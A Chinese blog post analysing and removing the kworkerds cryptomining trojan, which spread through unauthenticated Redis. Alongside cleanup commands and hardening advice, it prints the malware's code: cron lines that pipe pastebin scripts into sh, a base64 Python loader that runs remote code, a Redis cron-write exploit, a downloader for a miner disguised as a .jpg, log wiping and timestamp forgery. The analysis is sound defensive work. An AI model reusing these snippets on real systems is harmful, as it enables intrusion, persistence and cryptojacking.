zoukankan      html  css  js  c++  java
  • kworkerds 挖矿木马简单分析及清理

    公司之前的开发和测试环境是在腾讯云上,部分服务器中过一次挖矿木马 kworkerds,本文为我当时分析和清理木马的记录,希望能对大家有所帮助。

    现象

    • top 命令查看,显示 CPU 占用 100%,进程名无明显规则,如:TzBeq3AM。
      • 进程有时候会被隐藏,通过分析脚本删除部分依赖文件,可以显示出来。
    • 存在可疑的 python 进程。
    • crontab 被写入了一个定时任务,每半小时左右会从 pastebin 上下载脚本并且执行。

    原因

    redis 没有启用密码认证。

    清理方案

    将 redis 服务关闭,并设置密码。

    先阻断外部连接,再清理定时任务,之后删除挖矿病毒本体,防止再生。

    # 防止木马再次下载
    echo '127.0.0.1 pastebin.com' >> /etc/hosts
    
    # 删除掉局域网服务器之间的免密登录
    # 本机定时任务和木马都清理干净了,重启后木马又重新执行,最后发现是因为局域网服务器免密登录造成的,木马会通过免密登录互相复制。
    rm -rf ~/.ssh
    
    # 先 kill 掉木马进程,不然服务器操作起来极慢
    ps -ef|grep pastebin |grep -v grep|awk '{print $2}'|xargs kill -9
    ps -ef|grep kworkerds|grep -v grep|awk '{print $2}'|xargs kill -9
    
    # 清理定时任务及木马文件
    crontab -r
    
    chattr -i /etc/cron.d/root
    sudo echo "" > /etc/cron.d/root
    
    chattr -i /etc/cron.d/apache
    sudo echo "" > /etc/cron.d/apache
    
    chattr -i /var/spool/cron/root
    sudo echo "" > /var/spool/cron/root
    
    chattr -i /var/spool/cron/crontabs/root
    sudo echo "" > /var/spool/cron/crontabs/root
    
    chattr -i /usr/local/lib/libntpd.so
    rm -rf /usr/local/lib/libntpd.so
    
    chattr -i /etc/ld.so.preload
    rm -rf /etc/ld.so.preload
    
    chattr -i /usr/local/bin/dns
    rm -rf /usr/local/bin/dns
    
    rm -rf /etc/cron.hourly/oanacroner
    rm -rf /etc/cron.daily/oanacroner
    rm -rf /etc/cron.monthly/oanacroner
    rm -rf /tmp/kworkerds
    rm -rf /tmp/.38t9guft0055d0565u444gtjr0
    rm -rf /tmp/.a
    
    # 再次 kill 掉进程,防止清理过程中再次启动
    ps -ef|grep pastebin |grep -v grep|awk '{print $2}'|xargs kill -9
    ps -ef|grep kworkerds|grep -v grep|awk '{print $2}'|xargs kill -9
    
    # 验证进程 kill 成功
    ps -ef|grep kworkerds
    ps -ef|grep pastebin
    
    # 验证定时任务清理干净
    cat /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root
    
    # 验证相关木马文件删除干净
    ls /usr/local/lib/libntpd.so /etc/ld.so.preload /etc/cron.hourly/oanacroner /etc/cron.daily/oanacroner /etc/cron.monthly/oanacroner /tmp/kworkerds /tmp/.38t9guft0055d0565u444gtjr0 /tmp/.a
    
    # 查看当前用户定时任务
    crontab -l
    
    # 还原 hosts 配置
    sed -i 's/^127.0.0.1 pastebin.com*$//g' /etc/hosts
    
    # 重启再次验证
    reboot
    

    分析

    木马的核心代码逻辑如下:

    update=$( curl -fsSL --connect-timeout 120 https://pastebin.com/raw/TzBeq3AM )
    if [ ${update}x = "update"x ];then
    	echocron
    else
    	if [ ! -f "/tmp/.tmph" ]; then
    		rm -rf /tmp/.tmph
    		python
    	fi
    	kills
    	downloadrun
    	echocron
    	system
    	top
    	sleep 10
    	port=$(netstat -anp | grep :13531 | wc -l)
    	if [ ${port} -eq 0 ];then
    		downloadrunxm
    	fi
    	echo 0>/var/spool/mail/root
    	echo 0>/var/log/wtmp
    	echo 0>/var/log/secure
    	echo 0>/var/log/cron
    fi
    

    首先检查是否有更新,有更新就会执行 echocron 方法进行更新。

    function echocron() {
    	echo -e "*/10 * * * * root (curl -fsSL https://pastebin.com/raw/5bjpjvLP || wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh
    ##" > /etc/cron.d/root
    	echo -e "*/17 * * * * root (curl -fsSL https://pastebin.com/raw/5bjpjvLP || wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh
    ##" > /etc/cron.d/system
    	echo -e "*/23 * * * *	(curl -fsSL https://pastebin.com/raw/5bjpjvLP || wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh
    ##" > /var/spool/cron/root
    	mkdir -p /var/spool/cron/crontabs
    	echo -e "*/31 * * * *	(curl -fsSL https://pastebin.com/raw/5bjpjvLP || wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh
    ##" > /var/spool/cron/crontabs/root
    	mkdir -p /etc/cron.hourly
    	curl -fsSL https://pastebin.com/raw/5bjpjvLP -o /etc/cron.hourly/oanacron && chmod 755 /etc/cron.hourly/oanacron
    	if [ ! -f "/etc/cron.hourly/oanacron" ]; then
    		wget https://pastebin.com/raw/5bjpjvLP -O /etc/cron.hourly/oanacron && chmod 755 /etc/cron.hourly/oanacron
    	fi
    	mkdir -p /etc/cron.daily
    	curl -fsSL https://pastebin.com/raw/5bjpjvLP -o /etc/cron.daily/oanacron && chmod 755 /etc/cron.daily/oanacron
    	if [ ! -f "/etc/cron.daily/oanacron" ]; then
    		wget https://pastebin.com/raw/5bjpjvLP -O /etc/cron.daily/oanacron && chmod 755 /etc/cron.daily/oanacron
    	fi
    	mkdir -p /etc/cron.monthly
    	curl -fsSL https://pastebin.com/raw/5bjpjvLP -o /etc/cron.monthly/oanacron && chmod 755 /etc/cron.monthly/oanacron
    	if [ ! -f "/etc/cron.monthly/oanacron" ]; then
    		wget https://pastebin.com/raw/5bjpjvLP -O /etc/cron.monthly/oanacron && chmod 755 /etc/cron.monthly/oanacron
    	fi
    	touch -acmr /bin/sh /var/spool/cron/root
    	touch -acmr /bin/sh /var/spool/cron/crontabs/root
    	touch -acmr /bin/sh /etc/cron.d/system
    	touch -acmr /bin/sh /etc/cron.d/root
    	touch -acmr /bin/sh /etc/cron.hourly/oanacron
    	touch -acmr /bin/sh /etc/cron.daily/oanacron
    	touch -acmr /bin/sh /etc/cron.monthly/oanacron
    }
    

    检查 /tmp/.tmph 文件是否存在,如果存在则删除,执行 python 函数。

    function python() {
    	nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L2VSa3JTUWZFJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz'))" >/dev/null 2>&1 &
    	touch /tmp/.tmph
    }
    

    base64 的 python 代码解码后内容为:

    $ python
    Python 3.5.0 (v3.5.0:374f501f4567, Sep 12 2015, 11:00:19)
    [GCC 4.2.1 (Apple Inc. build 5666) (dot 3)] on darwin
    Type "help", "copyright", "credits" or "license" for more information.
    >>> import base64
    >>> base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L2VSa3JTUWZFJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz')
    b"#coding: utf-8
    import urllib
    import base64
    
    d= 'https://pastebin.com/raw/eRkrSQfE'
    try:
        page=base64.b64decode(urllib.urlopen(d).read())
        exec(page)
    except:
        pass"
    

    解码后的 python 代码又从https://pastebin.com/raw/eRkrSQfE读取内容,进行执行。

    再次解码后,内容为针对 redis 的攻击脚本,核心代码如下:

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(2)
    s.connect((self.host, 6379))
    s.send('set backup1 "
    
    
    */1 * * * * curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh
    
    
    "rn')
    s.send('set backup2 "
    
    
    */1 * * * * wget -q -O- https://pastebin.com/raw/xbY7p5Tb|sh
    
    
    "rn')
    s.send('config set dir /var/spool/cronrn')
    s.send('config set dbfilename rootrn')
    s.send('savern')
    s.close()
    

    接着,kills 函数主要是 kill 掉其他木马以及腾讯云、阿里云等安全监控服务。

    downloadrun 函数是下载木马 kworkerds 脚本并执行。

    function downloadrun() {
    	ps=$(netstat -anp | grep :13531 | wc -l)
    	if [ ${ps} -eq 0 ];then
    		if [ ! -f "/tmp/kworkerds" ]; then
    			curl -fsSL http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -o /tmp/kworkerds && chmod 777 /tmp/kworkerds
    			if [ ! -f "/tmp/kworkerds" ]; then
    				wget http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -O /tmp/kworkerds && chmod 777 /tmp/kworkerds
    			fi
    				nohup /tmp/kworkerds >/dev/null 2>&1 &
    		else
    			nohup /tmp/kworkerds >/dev/null 2>&1 &
    		fi
    	fi
    }
    

    接着执行 echocron 函数,写入定时任务,并清楚相关日志。

    之后执行 system 和 top 函数,下载相关依赖文件,隐藏进程等。

    sleep 10秒,判断是否与端口 13531 建立连接,如果没有则执行 downloadrunxm 函数,连接挖矿服务器。

    预防

    • 任何服务都要设置密码认证,且强密码。
    • 为每个服务创建指定用户运行,防止用 root 用户直接启动。
    • 启用防火墙规则。

    linux 知识点

    隐藏木马文件文件,防止通过时间排序来判断木马文件。

    touch -acmr /bin/sh /etc/ld.so.preload
    

    touch参数说明:

    • a 改变文件的读取时间记录;
    • c 假如文件不存在,不会建立新的文件。
    • m 改变文件的修改时间记录;
    • r 使用参考文件的时间记录。

    定时任务相关文件

    /var/spool/cron:目录下存放的是每个用户包括 root 的 crontab 任务,每个任务以创建者的名字命名。

    /etc/cron.d:用来存放任何要执行的 crontab 文件或脚本。

    /etc/cron.hourly、/etc/cron.daily、/etc/cron.weekly、/etc/cron.monthly:用 anacron 执行周期性的定时任务。

  • 相关阅读:
    AOP静态代理解析2-代码织入
    算法笔记_064:蓝桥杯练习 操作格子(Java)
    算法笔记_063:蓝桥杯练习 送分啦(Java)
    算法笔记_062:蓝桥杯练习 最小乘积(基本型)(Java)
    算法笔记_061:蓝桥杯练习 字串统计(Java)
    算法笔记_060:蓝桥杯练习 出现次数最多的整数(Java)
    算法笔记_059:蓝桥杯练习 Anagrams问题(Java)
    算法笔记_058:蓝桥杯练习 2的次幂表示(Java)
    算法笔记_057:蓝桥杯练习 最大的算式 (Java)
    算法笔记_056:蓝桥杯练习 未名湖边的烦恼(Java)
  • 原文地址:https://www.cnblogs.com/daodaotest/p/12548011.html
Copyright © 2011-2022 走看看